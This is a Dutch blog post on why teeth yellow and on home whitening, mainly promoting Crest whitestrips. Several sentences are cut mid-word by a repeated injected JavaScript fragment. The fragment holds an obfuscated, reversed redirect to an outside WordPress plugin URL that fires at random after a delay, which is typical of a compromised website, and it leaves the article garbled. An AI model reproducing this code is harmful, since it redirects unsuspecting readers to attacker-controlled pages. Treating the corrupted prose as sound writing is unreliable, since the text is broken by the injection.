Waarom worden mijn tanden geel?

Het is een vreselijk gevoel, dat je in de ochtend naar je tanden kijkt en je gebit niet mooi wit is. Je tanden verkleuren naar mate je ouder wordt, dit komt mede door de dingen die je eet en drinkt. Het is lastig om niks te eten, want je moet gewoon voeding binnen krijgen. Je kan hier wel rekening mee houden dat je niet alleen dingen eet die slecht voor je gebit zijn. Voornamelijk koolzuurhoudende dranken tasten ontzettend je glazuur aan, dit zorgt ervoor dat je gebit verkleurt. Wil je jouw tanden witter maken, lees dan het onderstaande artikel. tanden witter maken

Ik heb het artikel verdeeld in een aantal kopjes, je kan direct kijken of het bij je past en of dit van toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing is op jouw. Wij zullen je een tip geven hoe je het kan voorkomen en ervoor kan zorgen dat je gebit weer witter wordt.

Het geen je eet is ontzettend van belang hoe je tanden verkleuren. Het drinken van meerdere koppen koffie op een dag en het roken tasten de glazuur laag van je gebit ontzettend aan. Al deze externe factoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren zijn van belang bij het behouden van een mooi wit gebit. Door het drinken van producten die je glazuur aantasten krijgen je tanden een extra laagje wat niet direct verdwijnt. Het laagje dringt zich vervolgens door toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot je onderstaandste laag van je tanden en daardoor verkleuren je tanden. Dentine wordt dan zichtbaar, dentine is geel en daardoor worden je tanden geel.

De volgende factoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor waarover ik het wil hebben is je “Genen”. Als jouw ouders gele tanden hebben en je dit vreselijk lelijk vindt, kan je beter hun er niet teveel mee pesten. De kans is namelijk aanwezig dat jouw gebit ook geel wordt naar mate je ouder wordt. Dit is een proces wat onomkeerbaar is en je dus gewoon aan over moet geven.

Dit hangt een samen met het eerdere benoemde over voeding. Door het eten van dingen ontstaat er tandsteen op je gebit. Dit zorgt ervoor dat je gebit verkleurt. Als je naar de tandarts gaat dan maakt hij altijd je tanden schoon, omdat hij de tandsteen van je gebit verwijderd.

Ik wil graag mijn tanden witter maken

Er zijn verschillende mogelijkheden om je gebit witter te maken. Een dure behandeling bij de tandarts is wat te de meeste mensen eerst ten horen krijgen. Je informeert bij de tandarts en krijgt te horen dat je een behandeling kan krijgen, maar of je daarna wel paar honderd euro wilt afrekenen. Wij hebben een aantal alternatieven opgezocht die je gemakkelijk zelf kan uitvoeren en thuis je tanden kan bleken.

  • Non-Peroxide whitestrips

Dit zijn whitestrips die ook wel bekent staan als “plakstrips”. Deze strips plak je op je tanden en deze strips zullen na ongeveer een 30 minuten verwijderd moeten worden. Dit herhaal je 30 dagen en vervolgens zijn je tanden witter. Deze whitestrips bevatten geen peroxide, dit is waterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tofperoxide.

Het andere alternatief zijn de whitestrips van Crest. Dit zijn strips die bekroond zijn door meerdere magazines. Deze strips worden gebruikt door ontzettend veel bekende personen. Dit doen ze meestal voor belangrijke persbijeenkomsten. Deze strips werken erg snel en zorgen ervoor dat je tanden mooi wit worden en het gemakkelijkst is dat je ze gewoon thuis kan gebruiken. Mocht je direct resultaat willen dan kan je het beste kiezen voor de 1 Hour express. Deze strips zorgen ervoor dat je tanden binnen enkele uren aanzienlijker witter zijn.

Wil je liever een professioneel resultaat dan kan je het beste kiezen voor de Supreme Flexfit. Dit zijn de best beoordeelde whitestrips van Crest. Deze zullen super oude vlekken verwijderen op je tanden en je tanden witter maken.